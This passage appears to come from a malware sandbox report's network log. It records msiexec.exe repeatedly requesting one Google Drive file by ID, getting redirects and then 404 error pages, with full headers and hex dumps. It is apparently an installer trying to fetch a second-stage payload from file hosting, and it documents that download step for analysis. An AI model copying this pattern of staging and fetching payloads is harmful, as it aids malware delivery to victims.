                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:18 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:18 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-zRQ2-3UFjLpmhC7bbZXfeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.650011142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:18 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:19 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgQSvy0PWNCj3iEBmRNcR1lBwLRMjoa1-js4iGrdwzFfD35LRkARjDRNqMV_AyhXiiYRCvmwSBY
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:19 GMT
                                                                    Content-Security-Policy: script-src 'nonce-J-AJO7s5GtBWLiEISVe_Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 52 62 41 54 72 49 69 74 73 59 4d 35 77 74 36 57 79 69 34 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aRbATrIitsYM5wt6Wyi4kQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.650012216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:20 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:20 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:20 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-twheGSSx5th4lBeTd0endg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.650013142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:21 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:21 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgQXFlVnoPoSoaCZ-VhZH5PwAqIYy_lP7f_v20RhS_3274oaGNg7tTJuaKpjFFADm82ekGnkdB0
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:21 GMT
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: script-src 'nonce-yC7SrjGQMhvCaO-BuhRaeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 69 30 56 35 39 51 7a 4f 34 5f 44 6b 6a 43 68 7a 48 53 79 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ai0V59QzO4_DkjChzHSy6w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.650014216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:22 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:22 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:22 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-aMEXnnuiSvOH1qt50BzZaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.650015142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:23 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:23 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgSuLBWxBTWhtvbIxAWEz9k7FZbtEm5xpnIgr5OiEYXUMVuEjAd-ebiuK0ZRb_JFPSPTzq_U_Wg
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:23 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-qzHDhLanIGWPx8bo5cmBTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 67 33 39 70 4c 56 79 44 39 6f 4a 64 42 66 79 74 74 4f 68 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ig39pLVyD9oJdBfyttOhqw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.650016216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:24 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:25 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:24 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-7FlYbOE-mpaY5FYxXoiysA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.650017142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:25 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:26 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgSzbweVsItyvRnOlAa8CiI5FknY2DRoQPYXDcfvQBgv4IASAsU1vtihTmM7GOieeP8w5CKujvg
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:26 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-aEkAcqGmBg0qrqQl2A18bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
